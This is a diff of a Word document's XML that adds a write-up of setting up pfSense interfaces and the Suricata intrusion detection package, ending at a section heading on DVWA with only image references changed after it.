+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>pfSense</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and free to install. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AA6FB9E" wp14:editId="7D3E406D">
+            <wp:extent cx="5725160" cy="3578225"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="3175"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="3578225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:color w:val="2D3B45"/>
@@ -3696,6 +3966,15 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
@@ -3711,6 +3990,114 @@
           <w:lang w:eastAsia="en-GB"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In my </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>pfSense</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, I set up 3 interfaces </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for my local network. I also set up 2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>wirefalls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. The next step is setting up IDS. I could find the Suricata package in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>pfSense</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-System-Package Manager- Available Packages. Then I searched for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Suricata</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and I installed it. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3724,6 +4111,64 @@
           <w:lang w:eastAsia="en-GB"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="278C2123" wp14:editId="37DB94DE">
+            <wp:extent cx="5725160" cy="2512695"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="1905"/>
+            <wp:docPr id="15" name="Picture 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="2512695"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3740,12 +4185,266 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">I setup 3 IDS for every interface. However, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>It</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> says disabled so I still need to enable it. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="401A8F34" wp14:editId="456042F6">
+            <wp:extent cx="5716905" cy="2170430"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="18" name="Picture 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5716905" cy="2170430"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc113747828"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>To set rules for the WAN IDS for example, we need to go to Services / Suricata / WAN Interface Settings / WAN – Categories. Then we can check all the rules that we want for the interface’s IDS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We also can set up custom rules in WAN Rules section </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EE96B4" wp14:editId="2951E44E">
+            <wp:extent cx="5716905" cy="3100705"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="21" name="Picture 21"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5716905" cy="3100705"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3754,17 +4453,74 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc113747828"/>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-AS"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
         <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
@@ -4065,7 +4821,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Let’s</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -4102,7 +4857,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="print">
+                    <a:blip r:embed="rId17" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4222,7 +4977,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId18">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4280,7 +5035,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A73523" wp14:editId="03047995">
             <wp:extent cx="5732780" cy="3275965"/>
@@ -4299,7 +5053,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId19">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4403,6 +5157,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D424DFA" wp14:editId="413CAB98">
             <wp:extent cx="5725160" cy="1304290"/>
@@ -4421,7 +5176,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId20">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4615,7 +5370,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId21">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4690,7 +5445,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18">
+                    <a:blip r:embed="rId22">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4764,7 +5519,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19">
+                    <a:blip r:embed="rId23">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -4942,7 +5697,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20">
+                    <a:blip r:embed="rId24">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5032,7 +5787,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21">
+                    <a:blip r:embed="rId25">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5114,7 +5869,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
